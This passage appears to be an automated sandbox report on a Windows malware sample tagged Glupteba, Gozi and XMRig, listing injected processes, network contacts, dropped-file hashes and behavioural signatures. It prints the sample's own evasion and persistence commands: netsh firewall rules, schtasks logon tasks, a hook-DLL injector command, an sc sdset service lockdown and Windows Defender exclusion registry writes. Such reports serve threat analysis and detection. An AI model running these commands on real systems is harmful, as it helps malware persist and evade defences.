N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4404 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\System32\cmd.exe
PID 1408 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\System32\cmd.exe
PID 1476 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 1476 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 1408 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 1408 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 1408 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 5088 wrote to memory of 1684 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 1684 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 1684 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2956 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2956 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2956 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 4476 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 4476 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 4476 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2872 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 5088 wrote to memory of 2872 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1752 wrote to memory of 3376 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 1752 wrote to memory of 3376 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 1752 wrote to memory of 3376 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 88c40a03-a485-45a9-a6b0-1af072c047de.uuid.dumppage.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.l.google.com udp
US 8.8.8.8:53 server4.dumppage.org udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.111:443 server4.dumppage.org tcp
GB 142.251.29.127:19302 stun.l.google.com udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 127.29.251.142.in-addr.arpa udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
US 8.8.8.8:53 111.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
BG 185.82.216.111:443 server4.dumppage.org tcp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
BG 185.82.216.111:443 server4.dumppage.org tcp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.111:443 server4.dumppage.org tcp

Files

memory/4404-1-0x0000000003BC0000-0x0000000003FC6000-memory.dmp

memory/4404-2-0x0000000003FD0000-0x00000000048BB000-memory.dmp

memory/4404-3-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/3168-6-0x0000000006720000-0x0000000006756000-memory.dmp

memory/3168-7-0x0000000073A60000-0x000000007414E000-memory.dmp

memory/3168-8-0x00000000067E0000-0x00000000067F0000-memory.dmp

memory/3168-9-0x00000000067E0000-0x00000000067F0000-memory.dmp

memory/3168-10-0x0000000006E20000-0x0000000007448000-memory.dmp

memory/3168-11-0x0000000007450000-0x0000000007472000-memory.dmp

memory/3168-12-0x00000000075F0000-0x0000000007656000-memory.dmp

memory/3168-13-0x0000000007740000-0x00000000077A6000-memory.dmp

memory/3168-14-0x0000000007800000-0x0000000007B50000-memory.dmp

memory/3168-15-0x0000000007BB0000-0x0000000007BCC000-memory.dmp

memory/3168-16-0x0000000007BE0000-0x0000000007C2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqpfwof3.1pr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3168-35-0x0000000008C30000-0x0000000008C6C000-memory.dmp

memory/3168-66-0x0000000008CF0000-0x0000000008D66000-memory.dmp

memory/3168-73-0x000000007ED50000-0x000000007ED60000-memory.dmp

memory/3168-74-0x0000000009B50000-0x0000000009B83000-memory.dmp

memory/3168-75-0x0000000070770000-0x00000000707BB000-memory.dmp

memory/3168-76-0x00000000707C0000-0x0000000070B10000-memory.dmp

memory/3168-77-0x0000000009B30000-0x0000000009B4E000-memory.dmp

memory/3168-82-0x0000000009B90000-0x0000000009C35000-memory.dmp

memory/3168-83-0x00000000067E0000-0x00000000067F0000-memory.dmp

memory/3168-84-0x0000000009D70000-0x0000000009E04000-memory.dmp

memory/4404-259-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/4404-262-0x0000000003BC0000-0x0000000003FC6000-memory.dmp

memory/4404-264-0x0000000003FD0000-0x00000000048BB000-memory.dmp

memory/3168-280-0x0000000006A50000-0x0000000006A6A000-memory.dmp

memory/3168-285-0x0000000006A40000-0x0000000006A48000-memory.dmp

memory/3168-303-0x0000000073A60000-0x000000007414E000-memory.dmp

memory/4404-304-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1408-306-0x0000000003B00000-0x0000000003EFC000-memory.dmp

memory/1408-307-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1320-310-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1320-312-0x0000000002980000-0x0000000002990000-memory.dmp

memory/1320-311-0x0000000002980000-0x0000000002990000-memory.dmp

memory/1320-313-0x0000000007700000-0x0000000007A50000-memory.dmp

memory/1320-314-0x0000000007DC0000-0x0000000007E0B000-memory.dmp

memory/1320-333-0x000000007F710000-0x000000007F720000-memory.dmp

memory/1320-334-0x0000000070890000-0x00000000708DB000-memory.dmp

memory/1320-335-0x00000000708E0000-0x0000000070C30000-memory.dmp

memory/1320-340-0x0000000008F90000-0x0000000009035000-memory.dmp

memory/1320-341-0x0000000002980000-0x0000000002990000-memory.dmp

memory/1320-555-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1408-556-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/1200-560-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1200-561-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

memory/1408-562-0x0000000003B00000-0x0000000003EFC000-memory.dmp

memory/1200-563-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2b6c506a0d50bbc75a9566947e926ec9
SHA1 67c5a1e7574b4017bf24c8e30d6e12458c3558ac
SHA256 0d176367c76499ea776cb9ee7490411b5c82dcf6be206d5974a9c190688620ab
SHA512 5da966d7d5527f00826bf964a6a746dd53048cd8e6e9c36321cacccb9412e262e022efd274ceed6f20562ea34a8f0b6c04d55115b437101cb37641a01e90339c

memory/1200-583-0x0000000070890000-0x00000000708DB000-memory.dmp

memory/1200-584-0x00000000708E0000-0x0000000070C30000-memory.dmp

memory/1408-586-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1200-590-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

memory/1200-803-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1408-805-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/4800-807-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/4800-808-0x0000000007070000-0x0000000007080000-memory.dmp

memory/4800-809-0x0000000007070000-0x0000000007080000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 bdb432543f611637075443c76423086c
SHA1 5d44c1791c6d40b55a83d80530e3dbff66db767f
SHA256 f64f8ba0c94bc2924434fcf4e174b1897c4846a4ef771c64ce5611c1dc07c47f
SHA512 6a6e14f6d35d962e37c009dbb9329ef4915c970a8f144d4e7980cdbbf87c2aff506b6309b4a2192c1f4c0cf076ec5d9f692b1c0a8f4b523ef90980806fc76dab

memory/4800-829-0x0000000070890000-0x00000000708DB000-memory.dmp

memory/4800-830-0x00000000708E0000-0x0000000070C30000-memory.dmp

memory/4800-835-0x0000000007070000-0x0000000007080000-memory.dmp

memory/4800-1048-0x0000000073B60000-0x000000007424E000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 c8547afa1600ea08f4b6c07eccf14fc3
SHA1 6b2772a83692fca0317e3c0b9afe3eef1c978079
SHA256 bf75445061e32c8733fd4d6d46b6f386d083efe525658f6eb8f4e3164dd31822
SHA512 8c7ce913d279fb8e03399455072c2a87b1ed898ed2e1464f2d8b4bd0a39ccb543e775f21fd228a29669abcb58f03e6b0d5b8928b05b30d25b44e92216066cdbe

C:\Windows\rss\csrss.exe

MD5 49625ac40a34ae1839f287e30251580d
SHA1 420a1eef9f57933518461f32300505eae025dc24
SHA256 f4c72dd533d806e657317064d15a65cea8084aa1c25e1d4c4faca1542e813b4b
SHA512 7540ebd4715d802322c604e46cd5b393822e3491c631281df1132e889fdfba6a4d74b348be57897d2d22cd8c3f3c4c0c36ef9ca4f2e9d2b773e34f434cb8b9a1

memory/1408-1052-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1055-0x0000000004100000-0x00000000044F9000-memory.dmp

memory/5088-1056-0x0000000004500000-0x0000000004DEB000-memory.dmp

memory/5088-1057-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1684-1061-0x00000000073C0000-0x00000000073D0000-memory.dmp

memory/1684-1060-0x0000000073AC0000-0x00000000741AE000-memory.dmp

memory/1684-1062-0x00000000073C0000-0x00000000073D0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6229d99247a73a49bb2e6cf2ab4c8bb3
SHA1 bdbdf4818bf19df0e3f49fdcd037083a41f9f36b
SHA256 c149a72e7aa02da9de8d318d45ae18ba899bb7f02db6cfcd0a3d4b7dc8f72667
SHA512 41722a09074a3a5c784929de0db61beada8000bde45d86fdd44b5025fd1a4965ae14db3e621d77cf01ee08230c4e62c52a46016a59964dd9ce2d244cc294ebf8

memory/5088-1305-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 399ae37d9a1f08eead0c57fc1f051da8
SHA1 b82048686527a5ade7db31a6f6b012e1f35d55aa
SHA256 d388acf98b40c662ad26370489a97b49385e1164cdf0096fc103cff12b0b2d4f
SHA512 e67b2d3bc5c256be81766e045173917d84b0d6f087cb6038a8b3875ba82070cc2f7fa3a1097d2ac3f38831282746393cfb12273c5e0d322ace4906dc34634c4a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 697459bcf8d50154e6d9cf2cb4ecf6eb
SHA1 1a467284cc96d1252661c4da4c347137051efe6d
SHA256 6fca60d0a2c3840a773208386f57fde149e00c3bcb80cd59dd017db7075e73ce
SHA512 fd10a825c432b8110e2793a7c925452aad0561792b32cfc21e0a5e3e8f53b007e8001afb80ad9cc41a3280c97ffc0a24cb987d4e9e7aa480254c8d32015eac8a

memory/5088-1800-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/5088-1809-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1752-1814-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5088-1815-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5024-1816-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5088-1817-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1819-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5024-1820-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5088-1821-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1823-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1825-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1827-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1829-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1831-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1833-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1835-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1837-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1839-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1841-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1843-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1845-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1847-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1849-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1851-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1853-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1855-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1857-0x0000000000400000-0x0000000001E11000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-07 04:53

Reported

2024-03-07 04:58

Platform

win7-20240221-en

Max time kernel

286s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload


Gozi

banker trojan gozi

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

XMRig Miner payload

miner

xmrig

miner xmrig

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

UPX packed file

upx

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
